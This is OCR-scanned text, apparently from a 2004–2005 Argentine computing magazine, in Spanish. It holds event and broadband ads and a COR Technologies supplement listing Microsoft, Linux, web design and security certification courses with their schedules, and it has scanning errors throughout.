pal para realizar análisis de e-mail. 

Manejo de más de 270 diversos formatos de archivo. 

El explorador de FTK le permite navegar rápidamente por las 
imágenes adquiridas. 

Genera logs de auditoría y reporte de casos. 

Compatible con Password Recovery ToolkitTM and Distributed 
Network Attack6. 

Búsquedas avanzadas de imágenesGIF, BMP, JPEG y texto 
de Internet. 


SE VIENE EL GRAN EVENTO DE MÓVILES 2005 


EL ENCUENTRO LÍDER DEL MERCADO CELULAR ARGENTINO 
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NN 
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% 01009009 


LA REVOLUCIÓN IMIMIIIIIIIZo 
¡Viovil 
Congreso+Expo+Show Wireless 
E Conve reencia 


WWW.CONVERGENCIA.COM,AR 


Sheraton Hotel 
Bs As Argentina 


Para reservar su espacio o solicitar mayor información y tarifas 
contáctese al siguiente e-mail : 


Inscripciones al Congreso : eventomovil(Uconvergencia.com.ar 


La edición 2005 del evento 
de móviles tiene mucho 
para ofrecer: 


- Dos días de conferencias 
con oradores líderes del 
mercado, que analizarán el 
nuevo escenario de acción 
y el futuro del negocio 
celular, siempre con la 
mejor calidad académica. 


- Un área de exposición 
simultánea y show wireless 
con el doble de superficie 
donde las principales 
empresas del mercado 
exhibirán las últimas 
tecnologías, servicios y 
soluciones. Con lo más 
avanzado en desarrollos y 
dispositivos wireless: 
teléfonos, PDAs y laptops. 


- Corner de Aplicaciones y 
Corner de Accesorios. 


- Con un espacio especial 
destinado a Workshops y 
Demo shows en vivo 
durante los dos días. 


- Una convocatoria selectiva 
al máximo nivel para las 
conferencias y una expo de 
acceso libre a todos los 
interesados en nuevas 
tecnologías. 


NETIZEN ADSL 


BANDA 
ANCHA 


INSTALACION ANTISPAM GRATIS 
+ MODEM 


NS 
GRATIS BONIFICADO x6 MESES 


Microsoft Security LINUX 


Microsoft 

SUPLEMENTO GUÍA CURSOS Y CARRERAS 
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>> Carrera Microsoft Certified Systems Administrator (MCSA) Windows 2003 ............. Página 1 
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Technologies 


Microsoft Certified Systems Administrator (MCSA) 


Windows 2003 


| Examen 70-270: Installing, Configuring, 
and Administering Microsoft Windows 
| XP Professional 


EXAMEN Networkino 


Examen 70-290: Managing and Maintaining 
a Microsoft Windows Server 2003 Environment 


Examen 70-291: Implementing, Managing, and 
Maintaining a Microsoft Windows Server 2003 
| Network Infrastructure 


' EXAMEN - Elec 
| Examen 70-227: Installing, Configuring, and 
| Administering Microsoft Internet Security 
and Acceleration (ISA) Server 2000, 
Enterprise Edition 


14 


| $ Cursos: 5 (cinco) 


MOC's incluidos: 5 (cinco) 


URSO clien! 
Curso 2285: Installing, Configuring, and 
Administering Microsoft Windows XP 
Professional (Duración 16 hs) 


CURSO Network 


Curso 2273: Managing and Maintaining a 
Microsoft Windows Server 2003 
Environment (Duración 40 hs) 


Curso 2276: Implementing a Microsoft Windows 
Server 2003 Network Infrastructure: Network 
Hosts (Duración 16 hs) 


Curso 2277; Implementing, Managing, and 
Maintaining a MS Windows Server 2003 Network 


Infrastructure: Network Services (Duración 40 hs) 


Curso 2159: Deploying and Managing Microsoft 
Internet Security and Acceleration Server 2000 
(Duración 24 hs) 


Duración Total: 136 hs 


/ Fechas Inicio Calendario $ 
MCSA y MCSA Security 


HORARIO | 


Microsoft Certified Systems Administrator (MCSA Sec.) INICIO. DIAS 
: : 03-08-04 M- 9.00 a 13.00 
Security on Windows 2003 // Track Recomendado // AL: AROS NSO 
( 12-08-04 M-J 18.30 a 22.30 
EXAMEN - Client CURSO - Client 03-09-04 L-M-Y 9,00 a 13,00 
| Examen 70-270: Installing, Configuring, Curso 2285: Installing, Configuring, and RA $e y PEO ON 
| and Administering Microsoft Windows oleo Locos cos xP 05-10-04 M e 18.30 a 22.30 
| XP Professional | PARDO PUSICIóN 9500) 12-10-04 M-J 9.00a13.00 
EXAMEN - Networking _CURSO - Networking 13-10-04 L-M-V. 18,308 22.30 
| c 2273: M and Málntaini 02-11-04 M-J 9.00 a 13.00 
Examen 70-290: Managing and Maintaining caba IDO Na 10-11-04 L-M-Y 18,30 a 22.30 
a Microsoft Windows Server 2003 Environment | Microsoft Windows Server 2003 15-11-04 L-M-V 9.00 a 13,00 
| Environment (Duración 40 hs) 04-01-05 M-J 18.30 a 22.30 
14-01-05 L-M-YV 18,30 a 22.30 
Curso 2276: Implementing a Microsoft Windows 19-01-05 L-M-V  9.00a 13.00 
Examen 70-291: Implementing, Managing, and Server 2003 Network Infrastructure; Network 08-02-05 M-J 9.00 a 13.00 
Maintaining a Microsoft Windows Server 2003 Hosts (Duración 16 hs) 11-02-05 L-M-V 9.00 a 13.00 
Nehusdl nautica 18-02-05 L-M-Y 18.30 a 22.30 
Curso 2277: Implementing, Managing, and 15-03-05 M-J 9.00 a 13.00 
Maintaining a MS Windows Server 2003 Network 18-03-05 L-M-W 18,30 a 22.30 
Infrastructure: Network Services (Duración 40 hs) 10-03-05 M-J 18.30 a 22.30 
EXAMEN - Elective CURSO -Electi 19-04-05 M-J 18.30 a 22.30 
! pa 200 po Progr Mn Conan P Y 14-04-05 M-J 9.00 a 13.00 
amen /0-2£1: instatiing, Contigurnng, an ; 13-04-05 L-M-W 9.00 a 13,00 
| Administering Microsoft Internet Security Perder ito po hclodemgig stops 04-05-05 M-J 18.30 a 22.30 
Í and Acceleration (ISA) Server 2000, (Duración 24 he) 10-05-05 M-J 9.00 a 13.00 
| Enterprise Edition 18-05-05 L-M-V 18,30 a 22.30 
| 07-06-05 M-J 9.00 a 13.00 
| Examen 70-299: Implementing and Curso 2823: Implementing and Administering 15-06-05 L-M-V 18,30 a 22.30 
| Administering Security in a Microsoft Security in a Microsoft Windows Server 2003 17-06-05 L-M-Y  9.00a 13.00 
| Windows Server 2003 Network Network (Duración 40 hs) 05-07-05 M-J 18.30 a 22.30 
| 13-07-05 L-M-Y 18.30 a 22.30 
| fi Cursos: 6 (seis) MOC's incluidos: 6 (seis) Duración Total: 176 hs 15-07-05 L-M-Y 9,00 a 13.00 


Para más información sobre la carrera MCSA Windows 2003 visitá www.cortech.com.ar/ms/mcsa.htm 6 www.microsoft,com/learningimcp/mcsa/default.asp 


Certificaciones Internacionales 


¿Dónde se pueden rendir los exámenes para certificarme como 


MCSA y/o MCSE? 


Podés hacer los exámenes en cualquier centro CTEC (Certified 


MCSA? 


Todos los Tracks MCSA 


¿Cuáles son los Exámenes que debo tomar para recibirme de 


Existen muchísimas combinaciones de Exámenes para recibirse de 
MCSA: Microsoft Certified Systems Administrator. Cada una con 
diferentes especializaciones y electivos para tomar. 


MCSA 

http://www.cortech.com.ar/gen/mcsawin2003.pdf 

http //www.cortech.com.ar/ígen/MCSASec2000-2003.pdf 
http:/Awww.cortech.com.ar/gen/MCSAMes2000-2003.pdf 


Training Education Center) de tu localidad que provea exámenes VUE: 
Virtual Universities Enterprise (ver www.vue.com) 


Deberás entonces reservar tu turno de examen y abonar el costo 
correspondiente de 125.00 U$S en U.S.A. por examen; y 80,00 USS 
en Argentina (tarifas adicionales o descuentos pueden aplicarse en 
otras regiones). 


Microsoft Certified Systems Engineer (MCSE) 


Windows 2003 


EXAMEN - Client CURSO -Clien 


| Examen 70-270: Installing, Configuring, 


and Administering Microsoft Windows 
XP Professional 


FYAMEN -Ni , / IRSC 
EXAMEN - Networkina CURSO A 


Examen 70-290: Managing and Maintaining 
a Microsoft Windows Server 2003 Environment 


Curso 2276: Implementing a Microsoft Windows 
Server 2003 Network Infrastructure: Network 
Hosts (Duración 16 hs) 


Examen 70-291: Implementing, Managing, and 
Maintaining a Microsoft Windows Server 2003 
Network Infrastructure 


Curso 2277: Implementing, Managing, and 
Maintaining a MS Windows Server 2003 Network 
Infrastructure: Network Services (Duración 40 hs) 


Examen 70-293: Planning and Maintaining a 
Microsoft Windows Server 2003 
Network Infrastructure 


Examen 70-294: Planning. Implementing, and 
Maintaining a Microsoft Windows Server 2003 
Active Directory Infrastructure 

Examen 70-298: Designing Security for a 
Microsoft Windows Server 2003 Network 


EXAMEN - Electin S5URSC =lecth 


Examen 70-227: Installing, Configuring, and 
Administering Microsoft Internet Security 
and Acceleration (ISA) Server 2000, 
Enterprise Edition 


$ Cursos: 8 (ocho) 


(Duración 24 hs) 
MOC's incluidos: 8 (ocho) 


Microsoft Certified Systems Engineer (MCSE Sec.) 
Security on Windows 2003 (carrera MCse + Examen 70-299) 


' 


Examen 70-299: Implementing and 
Administering Security in a Microsoft 
Windows Server 2003 Network 


| f Cursos: 9 (nueve) MOC's incluidos: 9 (nueve) 


Microsoft Certified Systems Engineer // track Recomendado // 
Security + 2282 on Win. 2003 (Carrera McsE Security + Examen 70-297) 


Examen 70-297: Designing a Microsoft 
Windows Server 2003 Active Directory 
and Network Infrastructure 


1 Cursos: 10 (diez) MOC's incluidos: 10 (diez) 


3 


a 


Curso 2278: Planning and Maintaining a 
Microsoft Windows Server 2003 
Network Infrastructure (Duración 40 hs) 


Curso 2279: Planning, Implementing, and 
Maintaining a Microsoft Windows Server 2003 
Active Directory Infrastructure (Duración 40 hs) 


Curso 2830: Designing Security for Microsoft 
Networks (Duración 24 hs) 


Curso 2159: Deploying and Managing Microsoft 
Internet Security and Acceleration Server 2000 


Curso 2823: Implementing and Administering 
Security in a Microsoft Windows Server 2003 
Network (Duración 40 hs) 


Curso 2282: Designing a Microsoft Windows 
Server 2003 Active Directory and Network 
Infrastructure (Duración 40 hs) 


Duración Total: 320 hs | | 


CERTIFIED CERTIFIED 


for Learning Solutions 


Curso 2285: Installing, Configuring, and 
Administering Microsoft Windows XP 
Professional (Duración 16 hs) 


Curso 2273: Managing and Maintaining a 
Microsoft Windows Server 2003 
Environment (Duración 40 hs) 


Fechas Inicio Calendario 
MCSE, MCSE Security y MCSE Sec + 2282 | 


INICIO. DIAS HORARIO 
10-08-04 M-J 9.00a13.00 
20-08-04 L-M-V 18,30 a 22.30 
19-08-04 M-J 183032230 
10-09-04 L-M-V 9.002 13.00 
16-09-04 M-J 90021300 
15-09-04 L-M-V 18.30 a 22.30 
12-10-04 M-J 183022230 
19-10-04 M-J 9.00a13.00 
: l | 20-10-04 L-M-V 18.30 a 22.30 
Duración Total: 240 hs | | 09.11.04 MJ 90081300 
17-11-04 L-M-V 18.30 a22.30 
24-11-04 L-M-V 9.00a 13.00 
11-01-05 M-J 18.30 222.30 
21-01-05 L-M-V 18.30 a 22.30 
26-01-05 L-M-V 9.00 a 13.00 
. 15-02-05 M-J 9.00a13.00 
| 18-02-05 L-M-V 9.00a 13.00 
25-02-05 L-M-V 18.30 a 22.30 
22-03-05 M-J 9.00a13.00 
25-03-05 L-M-V 18.30 a 22.30 
z | |. 17-03-05 M-J 183022230 
DC TA | 28-04-05 MJ 18.30 a 22.30 
21-04-05 M-J 9.00a13.00 
20-04-05 L-M-V 9.00a13.00 
10-05-05 M-J 18.30a2230 
17-05-05 M-J 9.00a13.00 
25-05-05 L-M-V 18.30 a 22.30 
1 | 14-06-05 M-J 9.00a13.00 
22-06-05 L-M-V 18.30 a 22.30 
24-06-05 L-M-V 9.00a 13.00 
12-07-05 M-J 18.30a2230 
20-07-05 L-M-V 18,30 222.30 
22-07-05 L-M-V 9.00a 13.00 


Para más información sobre la carrera MCSE Windows 2003 visitá www.cortech.com,arimsimeso.htm ó www.microsoft.com/learningimcp/mecse/dofault.asp 


Todos los Tracks MCSE 


¿Cuáles son los Exámenes que debo tomar para recibirme de 
MCSE? 


Existen muchisimas combinaciones de Exámenes para recibirse de 
MCSE: Microsoft Certified Systems Engineer. Cada una con diferentes 
especializaciones y electivos para tomar. 


MCSE 

http://www.cortech.com.ar/gen/mcsewin2003.pdf 
http://www.cortech.com.ar/gen/MCSESec2000-2003.pdf 
http://www.cortech.com.ar/gen/MCSEMes2000-2003. pdf 


Logos MCP 


¿Cuáles son los logos que podré utilizar cuándo me reciba de MCP, 
MCSA, MCSE, MCDBA, MCAD ó MCSD?¿Existe alguna diferencia 
entre los logos con especializaciones en Security, Messaging, 
etc..? 


Al finalizar de haber rendido todos los Exámenes de cada Carrera 
Microsoft, podrás utilizar el logo correspondiente. Todos las Carreras 
(como asi tambien las especializaciones) poseen un logo diferente. 


Podés encontrar todos los logos Microsoft correspondientes en 
http /Awww.microsoft.com/lleaming/mcpexams/faq/logo.asp 


Microsoft Certified Application Developer (MCAD) 


Visual Basic .NET 


Examen 70-305: Developing and Implementing 
Web Applications with MicrosoftD Visual 
BasicW NET and Microsoft) Visual 

Studio NET 


Examen 70-310: Developing XML Web 
Services and Server Components with 
Microsoft) Visual BasicW .NET and the 
Microsoft) NET Framework 


AME 
h 


1] a j 
Examen 70-229: Designing and Impl. Databases 
with MS SQL Server 2000** Enterprise Edition 


| Cursos: 6 (seis) 


MOC's incluidos: 6 (seis) 


Curso 2559: Introduction to Visual Basic NET 
Programming with Microsoft NET (Duración 20 hs) 


Curso 2310: Developing Microsoft ASP.NET Web 
Applications Using Visual Studio .NET (Duración 40 hs) 


Curso 2415: Programming with the Microsoft NET 
Framework (Microsoft V, Basic9 .NET) (Duración 40 hs) 


Curso 2524: Developing XML Web Services Using 
Microsoft ASP.NET (Duración 20 hs) 


Curso 2557: Building COM+ Applications Using 
Microsoft) NET Enterprise Services (Duración 20 hs) 


Curso 2073: Programming a Microsoft SOL Server 
2000 Database (Duración 40 hs) 


Duración Total: 180 hs 


Microsoft Certified Solution Developer (MCSD) 
Visual Basic «NET (Carrera MCAD + Examen 70-300 + Examen 70-306) 


XKAMEN , ' ma 


| Examen 70-300: Analyzing Requirements 8 
Defining .NET Solution Architectures 


Examen 70-306: Developing 4 Impementing 
Windows-based Applications with Microsoft 
Visual Basic NET £ MS Visual Studio NET 


: fíCursos: 8 (ocho) 


MOC's incluidos: 8 (ocho) 


Curso 2710 : Analyzing Requirements and Defining NET 
Solution Architecture (Duración 40 hs) 


Curso 2565: Developing Microsoft NET Applications for 
Windows (Visual Basic NET) (Duración 20 hs) 


Duración Total: 240 hs 


Microsoft Certified Application Developer (MCAD) 


CF" NET 
Examen 70-315: Developing and Implementing 


Web Applications with Microsoft Visual 
CH" NET and Microsoft Visual Studio NET 


Examen 70-320: Developing XML Web 
Services and Server Components with 
Microsoft Visual Cif and the Microsoft 
NET Framework 


Ba, 
Examen 70-229: Designing and Impl. Databases 
with MS SQL Server 2000** Enterprise Edition 


¡ $ Cursos: 6 (seis) 


MOC's incluidos: 6 (seis) 


[| Track Recomendado // 


Curso 2609: Introduction to C4 Programming with 
Microsoft NET (Duración 20 hs) 


Curso 2310: Developing Microsoft ASP.NET Web 
Applications Using Visual Studio NET (Duración 40 hs) 


Curso 2349: Programming with the Microsoft NET 
Framework (Microsoft Visual CH NET) (Duración 40 hs) 


Curso 2524: Developing XML Web Services Using 
Microsoft ASP.NET (Duración 20 hs) 


Curso 2557: Bullding COM+ Applications Using 
Microsoft NET Enterprise Services (Duración 20 hs) 


RSO 


Curso 2073: Programming a Microsoft SOL Server 
2000 Database (Duración 40 hs) 


Duración Total: 180 hs 


for Leaming Solutions 


SQL Server | 
Las dos Certificaciones de SQL más importantes 

son: Examen 70-228 (Installing, Configuring, 

and Administering Microsoft SOL Server 2000 

Enterprise Edition) y Examen 70-229 (Designing 

and Implementing Databases with Microsoft 

SOL Server 2000 Enterprise Edition) 


Estos Exámenes podrán prepararse con los 
Cursos Oficiales 2072 (Administering a MS-SQL 
Server 2000 Database) y 2073 (Programming a 
MS-SOL Server 2000 Database) 
respectivamente 


Fechas Inicio Calendario 
MCAD 


V, Basic, MCSD y MCAD CR 
INICIO DIAS HORARIO 
03-08-04 M-J 9.00 a 13,00 
13-08-04 L-M-V 18.30 a 22.30 
12-08-04 M-J 18.30 a 22.30 
03-09-04 L-M-V 9.00 a 13.00 
09-09-04 M-J 9,00 a 13.00 
08-09-04 L-M-W 18,30 a 22.30 
05-10-04 M-J 18,30 a 22.30 
12-10-04 M-J 9.00 a 13.00 
13-10-04 L-M-V 18,30 a 22.30 
02-11-04 M-J 9.00 a 13.00 
10-11-04 L-M-YW 18,30 a 22.30 
15-11-04 L-M-Y  9.00a 13,00 
04-01-05 M-J 18.30 a 22.30 
14-01-05 L-M-Y 18,30 a 22.30 
19-01-05 L-M-W 9,00 a 13.00 
08-02-05 M-J 9.00 a 13.00 
11-02-05 L-M-W 9,00 a 13.00 
18-02-05 L-M-Y 18,30 a 22.30 
15-03-05 M-J 9.00 a 13.00 
18-03-05 L-M-Y 18,30 a 22.30 
10-03-05 M-J 18.30 a 22.30 
19-04-05 M-J 18,30 a 22.30 
14-04-05 M-J 9.00 a 13.00 
13-04-05 L-M-W 9.00 a 13.00 
04-05-05 M-J 18.30 a 22.30 
10-05-05 M-J 9,00 a 13.00 
18-05-05 L-M-Y 18,30 a 22.30 
07-06-05 M-J 9.00 a 13.00 
15-06-05 L-M-V 18,30 a 22.30 
17-06-05 L-M-V 9.00 a 13.00 
05-07-05 M-J 18.30 a 22.30 
13-07-05 L-M-V 18,30 a 22.30 
15-07-05 L-M-Y 9.00 a 13.00 


Para más información sobre la carrera MCAD .NET, MCSD y MCAD CH visitá www.cortech.com.ar/ms/ms4.htm ó www.microsoft.com/learning/mcp/mcad/ 


Links Microsoft 


¿Existe algún link en donde se puedan ver todos los Exámenes 
actuales de Microsoft y todos sus Cursos Oficiales asociados? 


Para ver todos los Exámenes Microsoft vigentes que existen visitá 
www.microsoft.com/learning/mcpexams/prepare/findexam.asp 
Allí los podrás visualizar por Carreras o por número de Examen, 


Y para ver todos los Cursos Oficiales vigentes visitá 
www.microsoft.comitraincertitraining/find/findcourse.asp 
Allí podrás visualizarlos por Producto o por número de Curso. 


Carrera MCDBA 


¿Cuáles son los exámenes que debo tomar para realizar la Carrera 
MCDBA? 


Para ver el listado completo de todas las opciones que existen para 
convertirte en Microsoft Certified Data Base Administrator (MCDBA) te 
recomendamos visitar la siguiente página WEB: 
http-//www.microsoft.com/learning/mcp/mcdba/default.asp. 


El Track recomendado para convertirte en MCDBA es realizar la Carrera 
MCSE de 240 hs de Duración (7 Exámenes) + los Exámenes de SQL 
Server 70-228 (Administering) y 70-229 (Programming) 


Fechas Inicio Calendario 
WEB Design Completa y Expert 


Carrera WEB Design Completa 
- WEB1 + W 


| % Cursos: 3 (tres) 


mi 


Examen Dreamweaver MX 2004 Designer 


Exámenes Flash MX 2004 Designer 
y Developer 


Exámenes Dreamweaver MX 2004 Designer 
y Developer 


B2 + WEB3 


i pa WEA 


Carrera WEB Design Expert 


Examen Dreamweaver MX 2004 Developer 


$ Cursos: 5 (cinco) 


INICIO. DIAS HORARIO 
06-08-04 L-M-V 9.308 12.30 
12-08-04 M-J 18.30a21.30 , 
17-08-04 M-J  14.00a17.00 
04-09-04 S 10.00 a 13.00 
08-09-04 L-M-V 18.30 a 21.30 
16-09-04 M-J 93021230 
01-10-04 L-M-V 9.308 1230 
07-10-04 M-J  18.30a21.30 
13-10-04 L-M-V 14.00 a 17.00 
06-11-04 S 10.00 a 13.00 
10-11-04 L-M-V  18.30a21.30 
18-11-04 M-J 93021230 
07-01-05 L-M-V 9.30a12.30 
13-01-05 M-J 18.30a21.30 
18-01-05 M-J  14.00a17.00 
05-02-05 S 10.00 a 13.00 
11-02-05 L-M-V 18.30 a 21.30 
17-02-05 M-J 93081230 
04-03-05 L-M-V 9.30212.30 - 
17-03-05 M-J 18.30 a 21.30 
18-03-05 L-M-Y 14.00 a 17.00 
09-04-04 S 10.00 a 13.00 
08-04-05 L-M-V 18.30 a 21.30 
21-04-05 M-J 93081230 
13-05-04 L-M-V 9.303 12.30 
12-05-05 M-J 18.30821.30 
19-05-05 M-J 14.00a17.00 
11-06-05 S 10.00 a 13.00 
15-06-05 L-M-V 18,30 a 21.30 
16-06-05 M-J 93021230 
06-07-05 L-M-V 9.308 12.30 
14-07-05 M-J 18.30221.30 
20-07-05 L-M-V 14.00 a 17.00 


WEB1 + WEB2 + 


¿ 


A En - Y 


ER Dosio 


CURS 


WOG's incluidos: 1 (uno) 


WEB Design 


Módulo WEB1: Curso de Front Page XP y 
Macromedia Dreamweaver MX 04 (Duración 18 hs) | 


Módulo WEB2: Curso de Macromedia Flash MX 04 
y Macromedia Fireworks MX 04 (Duración 21 hs) 


Módulo WEB3: Curso de Edición HTML e 
Introd. a Programación ASP (Duración 21 hs) 


Duración Total: 60 hs 


NE: | DOV DO! 


cb 


Avanzado (Duración 21 hs) 
Duración Total: 102 hs 


Carrera COR Security // Track Recomendado // 
SEC1 + SEC2 + Especialización (a elección) 


HAM 


h ", 


F E CISSP: Certified 
¡ 1 Information Systems 
Cissey Security Professional 


Módulo LX5: Seguridad y contra-seguridad en 
Redes (Duración 12hs) 
+ 


Workshop LX6: Workshops Servidor de 
Firewall y Squid (Comparación con ISA Server) 


(Duración 12 hs) 


+ 


Workshop LX8: Workshops Implementando 
VPNs bajo Linux (Duración 12 hs) 


Incluye Material 
fí Cursos: 5 (cinco) 


| Duración Total: 76 hs 


CURSO 
UAD! 


Clínica SEC1: Seguridad y sus fundamentos 
(Duración 20 hs) 


Clínica SEC2: Seguridad Avanzada 


(Duración 20 hs) 


Especialización crosoft 


j í 
A AIDA DA Pdo 


Curso 2159: Deploying and Managing Microsoft 
Internet Security and Acceleration Server 2000 
(Duración 24 hs) 

+ 

Curso 40 hs Seguridad Electivo de la Currícula 
Oficial Microsoft 

+ 

Curso 2823: Implementing and Administering 
Security in a Microsoft Windows Server 2003 
Network (Duración 40 hs) 


Incluye Material 
$ Cursos: 5 (cinco) 
Duración Total: 144 hs 


WOG's incluidos: 2 (dos) 


Para más información sobre la carrera WEB Design Completa y 
WEB Design Expert visitá www.cortech.com.ar/web/web1.htm 


WEB3 + WEB4 + WEBS5 // Track Recomendado // 


Módulo WEB4: Curso Programación ASP 
Avanzado (Duración 21 hs) 


Módulo WEB5: Curso Programación PHP 


Fechas Inicio Calendario 


Carrera COR Security 


INICIO. DIAS 
17-08-04 M-J 
27-08-04 L-M-V 
26-08-04 M-J 
17-09-04 L-M-V 
23-09-04 M-J 
22-09-04 L-M-V 
19-10-04 M-J 
26-10-04 M-J 
27-10-04 L-M-V 
16-11-04 M-J 
24-11-04 L-M-V 
29-11-04 L-M-V 
18-01-05 M-J 
28-01-05 L-M-V 
02-02-05 L-M-V 
22-02-05 M-J 
25-02-05 L-M-V 
04-03-05 L-M-V 
29-03-05 M-J 
23-03-05 L-M-V 
24-03-05 M-J 
14-04-05 M-J 
28-04-05 M-J 
27-04-05 L-M-V 
17-05-05 M-J 
24-05-05 M-J 
01-06-05 L-M-V 
21-06-05 M-J 
29-06-05 L-M-V 
01-07-05 L-M-V 
19-07-05 M-J 
27-07-05 L-M-V 
29-07-05 L-M-V 


+E 


specializaciones 
HORARIO 
9.00 a 13,00 
18.30 a 22.30 
18.30 a 22,30 
9.00 a 13.00 
9.00 a 13.00 
18.30 a 22,30 
18.30 a 22.30 
9.00 a 13.00 
18.30 a 22.30 
9.00 a 13.00 
18.30 a 22.30 
9.00 a 13.00 
18.30 a 22.30 
18.30 a 22.30 
9.00 a 13.00 
9.00 a 13.00 
9.00 a 13.00 
18.30 a 22.30 
9.00 a 13.00 
18.30 a 22.30 
18.30 a 22.30 
18.30 a 22.30 
9.00 a 13.00 
9.00 a 13.00 
18.30 a 22.30 
9.00 a 13.00 
18.30 a 22.30 
9.00 a 13.00 
18.30 a 22.30 
9.00 a 13,00 
18.30 a 22.30 
18.30 a 22,30 
9.00 a 13.00 


Para más información sobre la carrera COR Security y sus Especializaciones visitá www.secure105.com.ar 


Cursos Intensivos y Personalizados 
¿Cómo puedo hacer para que yo o la gente de mi Empresa pueda 
cursar cualquiera de los Cursos y Carreras Microsoft, Security, 
WEB Design o Linux de manera Personalizada / Intensiva? 


Te recomendamos averiguar por costos y metodologías de cursada de 
todos nuestros Cursos y Carreras para realizarlos de forma intensiva y 
personalizada ya sea en las Oficinas de COR TECH o in Company 


(Capital o Interior del País). 


Enviando solamente un email a intensiveOWcortech.com.ar o llamando 


al (54)11-4312-7694 


podrás encontraria en www.macromedia.com 


, | 


Certificaciones Macromedia 


¿Dónde se pueden rendir los exámenes para certificarme como 

Macromedia Dreamweaver MX 2004 Designer, Developer y Flash 
MX 2004 Designer, Developer? 
Podés hacer los exámenes en cualquier centro de tu localidad que provea 
exámenes VUE: Virtual Universities Enterprise (ver www.vue,com). 
Deberás entonces reservar tu turno de examen y abonar el costo 
correspondiente de 150.00 U$S para cada Examen MX 2004. 


Más información respecto de las Certificaciones Macromedia MX 2004 


Carrera Linux Completa 
LX1 + LX2 + LX3 


Módulo LX1: Curso Operador Linux 
(Duración 15 hs) 


Módulo LX2: Curso Administrador Linux 
(Duración 15 hs) 


Módulo LX3: Curso Redes Linux 
(Duración 15 hs) 


f Cursos: 3 (tres) LOC's incluidos: 1 (uno) Duración Total: 45 hs 


Carrera Linux Avanzada 
LX1 + LX2 + LX3 + LX4 + LX5 


Módulo LX4: Curso Redes Linux Avanzado 
(Duración 12 hs) 


4rina 


Módulo LX5: Curso Seguridad y Contra-Seguridad 
Linux (Duración 12 hs) 


LOC's incluidos: 2 (dos) 


LPIC-2 


¡ fí Cursos: 5 (cinco) 


Carrera Linux Expert // Track Recomendado // 
LX1 + LX2 + LX3 + LX4 + LX5 + 2 Workshops LX (a elección) 


LPIC+1: Workshops para Exámenes LPI-101 
y LP1-102 (Duración 12 hs) 


LPIC-2: Workshops para Exámenes LP1-201 
y LPI-202 (Duración 12 hs) 


LPICA LPIC-3 


LX6: Workshops Servidor de Firewall y Squid 
TM (Comparación con ISA Server) (Duración 12 hs) 


LX7: Workshops Clustering bajo Linux 
(Beowulf/ Open Mosix / Condor) (Duración 12 hs) 


LX38: Workshops Implementando VPNs bajo Linux 
(FreeSwan) (Duración 12 hs) 


LPIC-3 


LX9: Workshops Apache WEB Server 
(Duración 12 hs) 


S 


debian 


O 


Linux 
Professional 
Instituto 


Fechas Inicio Calendario 
Carrera Linux Complete, Advanced y Expert 


INICIO DIAS HORARIO 
11-08-04 L-M-V 9.30 a 12.30 
Duración Total: 69 hs 14-08-04 S 10.00 a 13.00 
17-08-04 M-J 18.30 a 21.30 
03-09-04 L-M-V 18.30 a 21.30 
09-09-04 M-J 9.30 a 12.30 
14-09-04 M-J 14.00 a 17.00 
06-10-04 L-M-V 9.30 a 12.30 
09-10-04 S 10.00 a 13.00 
14-10-04 M-J 18.30 a 21.30 
05-11-04 L-M-V 18.30 a 21.30 
11-11-04 M-J 9.30 a 12.30 
12-11-04 L-M-VY 14.00 a 17.00 
05-01-05 L-M-V 9.30 a 12.30 
08-01-05 S 10.00 a 13.00 
13-01-05 M-J 18.30 a 21.30 
04-02-05 L-M-V- 18.30 a 21,30 
E 10-02-05 M-J 9.30 a 12.30 
15-02-05 M-J 14.00 a 17.00 
04-03-05 L-M-V 9.30 a 12.30 
12-03-05 S 10.00 a 13.00 
17-03-05 M-J 18.30 a 21.30 
06-04-05 L-M-V 18.30 a 21.30 
14-04-05 M-J 9.30 a 12.30 
08-04-05 L-M-VW- 14.00 a 17.00 
04-05-05 L-M-V 9.30 a 12.30 
07-05-05 S 10.00 a 13,00 
12-05-05 M-J 18.30 a 21.30 
08-06-05 L-M-V  9.30a 12.30 
09-06-05 M-J 18.30 a 21.30 
14-06-05 M-J 14.00 a 17.00 
01-07-05 L-M-V 18.30 a 21.30 
14-07-05 M-J 9.30 a 12.30 
16-07-05 S 10.00 a 13.00 


| $ Cursos: 7 (siete) LOC's incluidos: 4 (cuatro) Duración Total: 93 hs 


Para más información sobre la carrera Linux Completa, Avanzada y Expert visitá www.cortech.com.ar/Ixc/lxc1.htm 


Costos de las Carreras y Cursos 
¿Dónde se puede averiguar el costo de los Cursos y Carreras 
Microsoft, Security, WEB Design y/o Linux? 


Podés averiguar los costos de los Cursos y Carreras acercándote 
personalmente a COR Technologies SRL: Av. Córdoba 657 Piso 12, 
telefónicamente llamando al (54)11-4312-7694, vía correo electrónico 
a masinfofMWcortech.com.ar, o en http://www.cortech.com.ar 


http://www.cortech.com.ar/gen/Cursos y Fechas COR.pdf 


COR [Technologies [TT 


Certificaciones LPI 


¿Dónde se pueden rendir los exámenes para certificarme en LPIC 
101, 102, 201 ó 202? 


Podés hacer los exámenes en cualquier centro de tu localidad que provea 
exámenes VUE: Virtual Universities Enterprise (ver www.vue.com) 
Deberás entonces reservar tu turno de examen y abonar el costo 
correspondiente de 150.00 USS para cada Examen, 


Más información respecto de las Certificaciones LPI podrás encontrarla en 
www.Ipi.org 


E-mail: infoSdattatec.com lo 
Web: http://www. dattatec.com dattatec . COM 
Tel; (+54 341) 453-4276 Hosting Solutions 


Advanced Security Enterprise 


Secutrel105 


AG al Enterprise 


wWww.secure105.com.ar 


